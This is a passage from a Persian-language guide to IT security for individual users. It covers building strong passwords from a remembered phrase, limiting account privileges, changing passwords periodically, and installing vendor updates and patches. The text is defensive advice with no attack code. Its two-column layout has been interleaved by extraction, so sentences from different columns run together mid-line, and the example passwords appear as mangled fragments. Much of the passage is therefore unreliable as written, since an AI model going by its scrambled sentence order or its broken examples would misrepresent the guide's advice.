‫ﺣﺮﻭﻑ ﺿﻌﻴﻒ ﺑﺎﺷﻴﺪ ﻭ ﻓﺮﺩﻱ ﺍﺯ ﭘﺸﺖ ﺳـﺮ ﺑـﻪ ﺷـﻤﺎ ﻭ‬
‫ﺻﻔﺤﻪﻛﻠﻴﺪ ﻧﮕﺎﻩ ﻛﻨﺪ‪ ،‬ﺧﻮﺍﻫﺪ ﺗﻮﺍﻧﺴﺖ ﺭﻣﺰ ﻋﺒﻮﺭ ﺷـﻤﺎ ﺭﺍ‬
‫ﺑﻔﻬﻤﺪ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٦٤‬‬

‫ﺍﻣﺘﻴﺎﺯﺍﺕ ﺭﺍ ﻣﺤﺪﻭﺩ ﻛﻨﻴﺪ‬ ‫ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎﻳﻲ ﻛﻪ ﺳﻨﹼﺖ ﻗـﺼﻪ ﮔـﻮﻳﻲ‬


‫ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺍﺷﻜﺎﻝ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻱ ﺑﺮﺍﻱ ﺁﻏﺎﺯ ﺩﺍﺳﺘﺎﻥ‬
‫ﺍﻛﺜﺮ ﺳﻴﺴﺘﻤﻬﺎ ﺑﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺍﻣﺘﻴﺎﺯﺍﺕ‪ ٢٦‬ﻣﺤﺪﻭﺩﻱ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻨـﺪ‬
‫ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺩﺭ ﺯﺑﺎﻥ ﺍﻧﮕﻠﻴﺴﻲ ﺩﺍﺳﺘﺎﻧﻬﺎﻱ ﻛﻮﺩﻛﺎﻥ‬

‫‪Onupatithwa‬‬
‫ﻛﻪ ﺍﺯ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﻛﻤﺘﺮ ﺍﺳـﺖ‪ .‬ﻫﻨﮕﺎﻣﻴﻜـﻪ ﺭﺍﻫﺒـﺮ ﻭ‬
‫ﻻ ﺑـﺎ ﻋﺒـﺎﺭﺕ ‪Once upon a time,‬‬ ‫ﻣﻌﻤـﻮ ﹰ‬
‫ﻛﺎﺭﺑﺮ ﺭﺍﻳﺎﻧﻪ ﻳﻜﻲ ﺑﺎﺷﻨﺪ )ﻧﻈﻴﺮ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ( ﻛـﺎﺭﺑﺮ‬
‫‪ there was‬ﺷﺮﻭﻉ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺩﺭ ﺍﻳـﻦ ﻣﺜـﺎﻝ ﺍﺯ‬
‫ﻛﻠﻴﺔ ﻛﺎﺭﻫﺎﻱ ﺧـﻮﺩ ﺭﺍ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻣﺘﻴـﺎﺯ ﺩﺳﺘﺮﺳـﻲ ﻛﺎﻣـﻞ‬
‫ﺍﺑﺘﺪﺍﻱ ﻫﺮ ﻟﻐﺖ ﺩﻭ ﺣﺮﻑ ﮔﺮﻓﺘﻪ ﺷـﺪﻩ ﺗـﺎ ﻃـﻮﻝ‬
‫)ﺍﻣﺘﻴﺎﺯﺍﺕ ﺭﻳﺸﻪ‪ ٢٧‬ﻳﺎ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺭﺍﻫﺒﺮ‪ (٢٨‬ﺍﻧﺠﺎﻡ ﻣﻲ ﺩﻫﺪ؛ ﺩﺭﺣﺎﻟﻴﻜﻪ ﺑﻬﺘﺮ‬
‫ﻛﻠﻤﻪ ﻋﺒﻮﺭ ﻣﺤﺪﻭﺩ ﺷـﻮﺩ ﻭ ﺩﺭ ﻋـﻴﻦ ﺣـﺎﻝ ﻗﺎﺑـﻞ‬
‫ﺍﺳﺖ ﺑﺮﺍﻱ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻏﻴﺮﺭﺍﻫﺒﺮﻱ ﺍﺯ ﻳـﻚ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ ﻣﺠـﺰﺍ‬
‫ﺷﻨﺎﺳﺎﻳﻲ ﻧﺒﺎﺷﺪ‪.‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪ .‬ﺍﻳﻨﻜﺎﺭ ﺍﺣﺘﻤﺎﻝ ﺧﺮﺍﺏ ﺷﺪﻥ ﻧﺎﺧﻮﺍﺳـﺘﺔ ﺳﻴـﺴﺘﻢ ﺭﺍ‬

‫‪T-1thuua‬‬
‫@‪oNup‬‬
‫ﻛﺎﻫﺶ ﻣﻲﺩﻫﺪ ﻭ ﺩﺭﺻﻮﺭﺕ ﻧﻔﻮﺫ ﻣﻬﺎﺟﻢ ﻧﻴﺰ ﺍﺯ ﺁﺳﻴﺐ ﻭﺍﺭﺩﻩ ﺑـﻪ‬ ‫ﻫﻤﺎﻥ ﻋﺒﺎﺭﺕ ﻗﺒﻠـﻲ ﻛـﻪ ﺩﺭ ﺁﻥ ﺟـﺎﻳﮕﺰﻳﻨﻲﻫـﺎ ﻭ‬
‫ﺳﻴﺴﺘﻢ ﺗﺎ ﺣﺪ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﻣﻲﻛﺎﻫﺪ‪.‬‬ ‫ﻋﻼﻣﺘﻬﺎﻱ ﮔﻔﺘﻪﺷﺪﻩ ﺑﻜﺎﺭ ﺭﻓﺘﻪ ﺍﺳﺖ‪.‬‬

‫ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ‬


‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﻣﺘﻨﺎﻭﺏ ﺗﻐﻴﻴﺮ ﻛﻨﻨﺪ‪ ،‬ﺍﻣﺎ ﺗﻨﺎﻭﺏ ﺍﻳـﻦ‬
‫ﺗﻐﻴﻴﺮ ﻫﻤﭽﻨﺎﻥ ﻣﻮﺭﺩ ﺑﺤﺚ ﺍﺳﺖ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﻣﺘﺨﺼﺼﺎﻥ ﺍﻣﻨﻴﺘـﻲ‬
‫ﺗﻮﺻﻴﻪ ﻛﺮﺩﻩ ﺍﻧﺪ ﻛﻪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻓﻮﺍﺻﻞ ﺯﻣـﺎﻧﻲ ﻛﻮﺗـﺎﻩ‬
‫ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ؛ ﺍﻣﺎ ﻋﺪﻩﺍﻱ ﻣﻌﺘﻘﺪﻧـﺪ ﻛـﻪ ﺍﻳﻨﻜـﺎﺭ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺳﺎﺩﻩ ﺍﻧﺘﺨـﺎﺏ ﺷـﻮﻧﺪ ﻭ ﻳـﺎ ﺑـﺮﺍﻱ ﺟﻠـﻮﮔﻴﺮﻱ ﺍﺯ‬
‫ﻓﺮﺍﻣــﻮﺵ ﺷــﺪﻥ ﺩﺭ ﺟــﺎﻳﻲ ﻧﻮﺷــﺘﻪ ﺷــﻮﻧﺪ‪ .‬ﺑــﺮﺍﻱ ﻛﺎﺭﺑﺮﺩﻫــﺎﻱ‬
‫ﻣﻌﻤﻮﻟﻲ ﻧﻜﺎﺕ ﺯﻳﺮ ﺗﻮﺻﻴﻪ ﻣﻲﺷﻮﻧﺪ‪:‬‬
‫ﺍﮔﺮ ﻓﻜﺮ ﻣﻲﻛﻨﻴﺪ ﺭﻣﺰ ﻋﺒﻮﺭﺗﺎﻥ ﺩﺭ ﻣﻌﺮﺽ ﺳـﺮﻗﺖ ﺑـﻮﺩﻩ‬ ‫•‬
‫ﺳﺮﻳﻌﹰﺎ ﺁﻧﺮﺍ ﻋﻮﺽ ﻛﻨﻴﺪ‪.‬‬
‫ﺍﮔﺮ ﺭﻣﺰ ﻋﺒﻮﺭﺗﺎﻥ ﺭﺍ ﺑﻪ ﻫﺮ ﺩﻟﻴﻠـﻲ ﺑـﻪ ﺷـﺨﺺ ﺩﻳﮕـﺮﻱ‬ ‫•‬
‫ﺩﺍﺩﻩﺍﻳﺪ ﺑﺴﺮﻋﺖ ﺁﻧﺮﺍ ﺗﻐﻴﻴﺮ ﺩﻫﻴﺪ‪ .‬ﺑـﻪ ﺍﺷـﺘﺮﺍﻙ ﮔﺬﺍﺷـﺘﻦ‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﻛﺎﺭ ﺻﺤﻴﺤﻲ ﻧﻴﺴﺖ ﻭ ﺑﺎﻳﺪ ﺍﺯ ﺁﻥ ﺍﺟﺘﻨﺎﺏ‬
‫ﻛﺮﺩ؛ ﻣﮕﺮ ﺍﻳﻨﻜﻪ ﻭﺍﻗﻌﹰﺎ ﭼـﺎﺭﻩﺍﻱ ﺟـﺰ ﺁﻥ ﻭﺟـﻮﺩ ﻧﺪﺍﺷـﺘﻪ‬
‫ﺑﺎﺷﺪ‪.‬‬
‫ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﺍ ﺑﺼﻮﺭﺕ ﻣﺘﻨﺎﻭﺏ ﻋـﻮﺽ ﻛﻨﻴـﺪ‪ .‬ﻣﻌﻨـﻲ‬ ‫•‬
‫ﻛﻠﻤﺔ "ﻣﺘﻨﺎﻭﺏ" ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺍﻓﺮﺍﺩ ﻣﺨﺘﻠﻒ‪ ،‬ﻣﺘﻔﺎﻭﺕ ﺍﺳـﺖ‪.‬‬
‫ﺷﺎﻳﺪ ﺩﻭﺭﻩﻫﺎﻳﻲ ﺑﻴﻦ ‪ ۶‬ﻣﺎﻩ ﺗﺎ ﻳﻜﺴﺎﻝ ﺑـﻪ ﻧﻈـﺮ ﻣﻨﺎﺳـﺐ‬
‫ﺑﺎﺷﻨﺪ‪.‬‬
‫ﺍﮔﺮ ﺳﻴﺎﺳﺖ ﺳﺎﺯﻣﺎﻧﻲ ﺷﻤﺎ ﺩﺭ ﺍﻳﻦ ﻣﻮﺭﺩ ﺩﻗﻴﻘﺘﺮ ﺍﺳـﺖ ﺍﺯ‬ ‫•‬
‫ﺁﻥ ﭘﻴﺮﻭﻱ ﻛﻨﻴﺪ‪.‬‬

‫‪26‬‬ ‫‪Privilege‬‬
‫‪27‬‬ ‫‪Root Privilege‬‬
‫‪28‬‬ ‫‪Administrator Privilege‬‬
‫‪٦٥‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫ﺍﺳﺖ‪ .٣٠‬ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺍﻏﻠﺐ ﻣﺤﺼﻮﻻﺕ ﻣﻌﻤﻮ ﹰ‬


‫ﻻ ﺑـﺮﺍﻱ ﻛـﺎﺭﺑﺮﺍﻥ‬
‫ﻫﺰﻳﻨﻪﺍﻱ ﺩﺭ ﺑﺮ ﻧﺪﺍﺭﺩ‪.‬‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺗﺠﺎﺭﻱ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﻨﺪ ﺑـﺮﺍﻱ‬
‫ﺭﻓــﻊ ﺍﺷــﻜﺎﻻﺕ ﻭ ﺁﺳــﻴﺐﭘــﺬﻳﺮﻳﻬﺎﻱ ﺍﻣﻨﻴﺘــﻲ ﻧــﺮﻡﺍﻓــﺰﺍﺭ‪،‬‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲﻫﺎﻱ ﺁﻧﺮﺍ ﻧﻴﺰ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺑﺮﺍﻱ ﺩﺭﻳﺎﻓـﺖ ﺧـﺪﻣﺎﺕ‬ ‫ﻓﺼﻞ ﭼﻬﺎﺭﻡ‬
‫ﻻ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ‬ ‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺑﺰﺭﮒ ﻣﻌﻤﻮ ﹰ‬ ‫ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ‬
‫ﺁﻧﻬﺎ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ ﻭ ﺍﺯ ﻗﺴﻤﺖ "‪ "Support‬ﻳـﺎ "‪"Download‬‬
‫ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫ﺍﺻﻼﺣﺎﺕ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺑﺮﺍﻱ ﻣﺤﺼﻮﻻﺕ ﺭﺍ ﺑﻴﺎﺑﻴﺪ‪.‬‬


‫ﻭﻗﺘﻲ ﺑـﻪ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﻓﺮﻭﺷـﻨﺪﺓ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﻣﺮﺍﺟﻌـﻪ ﻣـﻲﻛﻨﻴـﺪ‬
‫ﻛﻠﻴﺎﺕ‬
‫ﺑﺴﺘﻪﻫﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻭ ﻧﺴﺨﻪﻫﺎﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﺓ ﺧﻮﺩ ﺭﺍ ﺗﻌﻴـﻴﻦ‬
‫ﻣﻲﻧﻤﺎﻳﻴﺪ ﻭ ﺳﭙﺲ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻓﻬﺮﺳـﺘﻲ ﺍﺯ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲﻫـﺎﻱ‬ ‫ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﺑﺮﺭﺳﻲ ﻓﻨﻮﻧﻲ ﻣﻲﭘـﺮﺩﺍﺯﻳﻢ ﻛـﻪ ﺍﺯ ﺁﻧﻬـﺎ ﺑـﺮﺍﻱ‬
‫ﻼ‬
‫ﻗﺎﺑﻞ ﺩﺭﻳﺎﻓﺖ ﺭﺍ ﺍﺭﺍﺋﻪ ﺧﻮﺍﻫـﺪ ﻛـﺮﺩ‪ .‬ﺩﺭ ﺑﺮﺧـﻲ ﺍﺯ ﻣـﻮﺍﺭﺩ ﻛـﺎﻣ ﹰ‬ ‫ﻛﺎﻫﺶ ﺁﺳﻴﺐ ﭘﺬﻳﺮﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﺩﺭ‬
‫ﻣﺸﺨﺺ ﺍﺳﺖ ﻛﻪ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲﻫﺎﻱ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺑﺮﺍﻱ ﺭﺍﻳﺎﻧﻪ ﺷـﻤﺎ‬ ‫ﺑﺮﺍﺑﺮ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﻗﺎﺑﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻫﺴﺘﻨﺪ‪ ،‬ﺍﻣﺎ ﺩﺭ ﺑﻌﻀﻲ ﻣـﻮﺍﺭﺩ ﺩﻳﮕـﺮ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ‬
‫ﻭﺿﻮﺡ ﻛﻤﺘﺮﻱ ﺩﺍﺭﺩ‪ .‬ﻭﻗﺘﻲ ﺷﻤﺎ ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲﻫﺎﻱ ﻣﻮﺭﺩ ﻧﻈﺮﺗﺎﻥ‬ ‫ﻣﻘﺪﻣﻪ‬
‫ﺭﺍ ﺍﻧﺘﺨﺎﺏ ﻛﺮﺩﻳﺪ‪ ،‬ﺁﻧﻬﺎ ﺭﺍ ‪ download‬ﻣﻲﻛﻨﻴـﺪ ﻭ ﺩﺭ ﻣﺮﺣﻠـﺔ‬ ‫ﺍﺻﻞ ﺍﻭﻝ‪ :‬ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺭﺍ ﺍﺟﺮﺍ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﺑﻌﺪ ﺁﻧﻬﺎ ﺭﺍ ﻧﺼﺐ ﻣﻲﻧﻤﺎﻳﻴﺪ‪ .‬ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﻧـﻮﻉ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ﺍﻣﻜـﺎﻥ‬ ‫ﺍﺻﻞ ﺩﻭﻡ‪ :‬ﺑﺮﻧﺎﻣﻪﻫﺎ ﺍﺷﻜﺎﻝ ﺩﺍﺭﻧﺪ‪.‬‬
‫ﺩﺍﺭﺩ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ‪ download‬ﻛﺮﺩﻩﺍﻳـﺪ ﺑـﺴﺎﺩﮔﻲ ﻭ ﺩﺭ ﻳـﻚ‬ ‫ﺍﺻﻞ ﺍﻭﻝ ﺑﺪﻳﻬﻲ ﺍﺳﺖ؛ ﻭ ﺍﺻﻞ ﺩﻭﻡ ﻧﻴـﺰ ﺑـﺎ ﺗﻮﺟـﻪ ﺑـﻪ ﺍﻳﻨﻜـﻪ‬
‫ﻣﺮﺣﻠﻪ ﺍﺟﺮﺍ ﺷﻮﺩ ﻭ ﻳﺎ ﺍﻳﻨﻜﻪ ﺑﺮﺍﻱ ﻧﺼﺐ ﺷﺪﻥ ﻧﻴﺎﺯﻣﻨـﺪ ﺍﺟـﺮﺍﻱ‬ ‫ﻼ ﻣـﻮﺭﺩ ﺍﻧﺘﻈـﺎﺭ‬‫ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﺎﻥ ﺍﻓﺮﺍﺩ ﺑﺪﻭﻥ ﻧﻘـﺺ ﻧﻴـﺴﺘﻨﺪ ﻛـﺎﻣ ﹰ‬
‫ﺩﺳﺘﻮﺭﺍﻟﻌﻤﻠﻬﺎﻱ ﺧﺎﺻﻲ ﺑﺎﺷﺪ‪ .‬ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﺑﺴﺘﺔ ﻧﺮﻡﺍﻓـﺰﺍﺭﻱ‬ ‫ﺍﺳﺖ‪ .‬ﻣﻌﻠﻮﻡ ﻧﻴﺴﺖ ﭼـﺮﺍ ﺍﻳـﻦ ﺣﺠـﻢ ﺯﻳـﺎﺩ ﺍﺯ ﻣـﺴﺎﺋﻞ ﺍﻣﻨﻴﺘـﻲ‬
‫ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ ﺑﻌﺪ ﺍﺯ ‪ download‬ﺷﺪﻥ ﺗﻘﺮﻳﺒﹰﺎ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ‬ ‫ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﺷﻜﺎﻻﺕ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺴﻲ ﻫﺴﺘﻨﺪ‪ .‬ﻫﻨﮕﺎﻡ ﺗﻮﺳﻌﻪ ﺑﺮﻧﺎﻣﻪ‬
‫ﻧﺼﺐ ﻣﻲﮔﺮﺩﺩ‪.‬‬ ‫‪٢٩‬‬
‫ﺑﺮﺍﺣﺘﻲ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺑﺮﻭﺯ ﺍﺷﻜﺎﻻﺗﻲ ﻧﻈﻴﺮ ﺳـﺮﺭﻳﺰ ﺷـﺪﻥ ﺑـﺎﻓﺮ‬
‫ﻻ ﺍﺯ ﺳﻪ ﺭﻭﺵ ﻋﻤﺪﻩ ﺑﺮﺍﻱ ﺍﺭﺍﺋﻪ ﺧـﺪﻣﺎﺕ‬
‫ﺩﺭ ﺳﺎﻟﻬﺎﻱ ﺍﺧﻴﺮ ﻣﻌﻤﻮ ﹰ‬ ‫ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩ‪ ،‬ﺍﻣﺎ ﺑﺎ ﺍﻳﻦ ﻭﺟﻮﺩ ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ ﺗﻘﺮﻳﺒـﹰﺎ ﻧﻴﻤـﻲ ﺍﺯ‬
‫ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺍﺳﺖ‪:‬‬ ‫ﻣﺸﻜﻼﺕ ﺟﺪﻱ ﺍﻣﻨﻴﺘﻲ ﺍﺯ ﺍﻳﻦ ﺩﺳﺘﻪﺍﻧﺪ‪.‬‬
‫ﺑـﺮﺍﻱ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻳﻲ ﻧﻈﻴـﺮ ‪،Microsoft Windows‬‬ ‫‪.۱‬‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺗﺠﺎﺭﻱ‬
‫ﺷﺮﻛﺖ ﻣﺎﻳﻜﺮﻭﺳﺎﻓﺖ ﺑﺴﺘﻪﻫﺎﻱ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ‬
‫ﭘﺎﻳﮕﺎﻩ ﻭﺏ "‪ "Windows Update‬ﻣﻨﺘـﺸﺮ ﻣـﻲﻛﻨـﺪ‪.‬‬ ‫ﻻ ﭼﮕﻮﻧﻪ ﻛﺎﺭ ﻣﻲﻛﻨﺪ؟‬
‫ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺗﺠﺎﺭﻱ ﻣﻌﻤﻮ ﹰ‬
‫ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺭﺍﻳﺎﻧـﺔ ﺷـﻤﺎ ﺭﺍ ﺑﺮﺭﺳـﻲ ﻛـﺮﺩﻩ ﻭ‬
‫ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲﻫﺎﻱ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺳﻴﺴﺘﻢ ﺭﺍ ﺍﺭﺍﺋـﻪ‬ ‫ﭼﻨﺪ ﺳﺎﻝ ﻗﺒﻞ ﻫﻨﮕﺎﻣﻴﻜﻪ ﻳﻚ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺍ ﻣﻲﺧﺮﻳﺪﻳﺪ‪ ،‬ﺗﺎ ﺯﻣـﺎﻥ‬
‫ﻣﻲﻧﻤﺎﻳـﺪ‪ ،‬ﻭ ﺁﻧﮕـﺎﻩ ﺷـﻤﺎ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺁﻧﻬـﺎ ﺭﺍ ﺍﻧﺘﺨـﺎﺏ‪،‬‬ ‫ﻋﺮﺿﺔ ﻧﺴﺨﺔ ﺟﺪﻳﺪ ﺁﻥ ﺑﻪ ﺑﺎﺯﺍﺭ ﻫﻴﭻ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﺩﺭ ﺁﻥ ﺍﻋﻤﺎﻝ‬
‫‪ download‬ﻭ ﻧﺼﺐ ﻛﻨﻴﺪ‪.‬‬ ‫ﻧﻤﻲﺷﺪ‪ .‬ﺍﻣﺮﻭﺯﻩ ﺑﺪﻻﻳﻞ ﻣﺨﺘﻠﻒ ‪ -‬ﺑﺨﺼﻮﺹ ﺑﻪ ﺩﻟﻴـﻞ ﻣـﺴﺎﺋﻞ‬
‫ﺍﻣﻨﻴﺘــﻲ ‪ -‬ﺑﻴــﺸﺘﺮ ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎ ﺑــﺼﻮﺭﺕ ﻣــﻨﻈﻢ ﺑــﻪﺭﻭﺯﺭﺳــﺎﻧﻲ‬
‫ﻣﻲﺷﻮﻧﺪ‪ .‬ﺑـﺮﺍﻱ ﺑﺮﺧـﻲ ﺍﺯ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﻣﺜـﻞ ﺳﻴـﺴﺘﻢﻋﺎﻣﻠﻬـﺎ‪،‬‬
‫ﺩﺭ ﺍﻛﺘﺒﺮ ‪ ۲۰۰۳‬ﻭ ﺑﺪﻧﺒﺎﻝ ﻳﻚ ﻣﺸﻜﻞ ﺍﻣﻨﻴﺘﻲ ﺟﺪﻱ ﺩﺭ ‪Microsoft‬‬ ‫‪۳۰‬‬
‫"ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻣﻨﻈﻢ" ﺑﻪ ﻣﻌﻨـﻲ ﺍﻧﺠـﺎﻡ ﺍﻳﻨﻜـﺎﺭ ﺑـﺼﻮﺭﺕ ﺭﻭﺯﺍﻧـﻪ‬
‫‪ ،Windows‬ﻣﺎﻳﻜﺮﻭﺳــﺎﻓﺖ ﻧﺘﻴﺠــﻪﮔﻴــﺮﻱ ﻛــﺮﺩ ﻛــﻪ ﺷــﺎﻳﺪ ﻏﻴــﺮ‬
‫ﻭﺍﻗﻊﺑﻴﻨﺎﻧﻪ ﻭ ﻧﺎﻣﻌﻤﻮﻝ ﺑﺎﺷﺪ ﻛﻪ ﺗﻮﻗﻊ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﺎﺭﺑﺮﺍﻥ ﻭﺻـﻠﻪﻫـﺎﻱ‬
‫ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﻄﻮﺭ ﻫﻔﺘﮕﻲ ﻧـﺼﺐ ﻛﻨﻨـﺪ؛ ﻭ ﻟـﺬﺍ ﺍﺯ ﺁﻥ ﭘـﺲ ﻭﺻـﻠﻪﻫـﺎ ﺭﺍ‬
‫ﺑﺼﻮﺭﺕ ﻣﺎﻫﺎﻧﻪ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﺪ‪ ،‬ﻣﮕﺮ ﺩﺭ ﺣﺎﻟﺘﻲ ﻛﻪ ﻣﺸﻜﻞ ﺑﺴﻴﺎﺭ ﺟﺪﻱ‬
‫ﻭ ﻓﻮﺭﻱ ﺑﺎﺷﺪ‪.‬‬ ‫‪29‬‬ ‫‪Buffer Overflow‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٦٦‬‬

‫ﺩﺭ ﺷﺮﺍﻳﻄﻲ ﻛﻪ ﺍﺣﺘﻤﺎﻝ ﺧﻄﺮﺍﺕ ﺍﻣﻨﻴﺘﻲ ﺩﺭﺣﺎﻝ ﺍﻓـﺰﺍﻳﺶ ﺍﺳـﺖ‬ ‫ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺑـﺴﺘﺔ ﺑـﻪﺭﻭﺯﺭﺳـﺎﻧﻲ ﻛـﻪ ﺑـﻪ ﺭﻭﺵ ﻓـﻮﻕ‬ ‫‪.۲‬‬
‫ﺭﺍﻩ ﺍﻭﻝ ﻣﻨﻄﻘﻲ ﺑﻨﻈﺮ ﻧﻤﻲﺭﺳﺪ‪ .‬ﺑﻨـﺎﺑﺮﺍﻳﻦ ﺗﻨﻬـﺎ ﮔﺰﻳﻨـﺔ ﻣﻨﺎﺳـﺐ‬ ‫‪ download‬ﻣﻲﺷﻮﺩ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻭﺍﻗﻌﻲ ﻧﻴﺴﺖ‪ ،‬ﺑﻠﻜـﻪ‬
‫‪ download‬ﻛــﺮﺩﻥ ﻭ ﺑــﻪﺍﺷــﺘﺮﺍﻙﮔﺬﺍﺷــﺘﻦ ﻭﺻــﻠﻪﻫــﺎ ﻭ‬ ‫ﺑﺮﻧﺎﻣﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺩﺭ ﺯﻣﺎﻥ ﺍﺟﺮﺍ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻭﺍﻗﻌـﻲ ﺭﺍ‬
‫ﺍﺻﻼﺣﻬﺎﻱ ‪download‬ﺷﺪﻩ ﺍﺳﺖ‪.‬‬ ‫‪ download‬ﻣﻲﻛﻨﺪ‪ .‬ﺍﻳﻦ ﺑﺮﻧﺎﻣـﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺗﻨﻬـﺎ‬
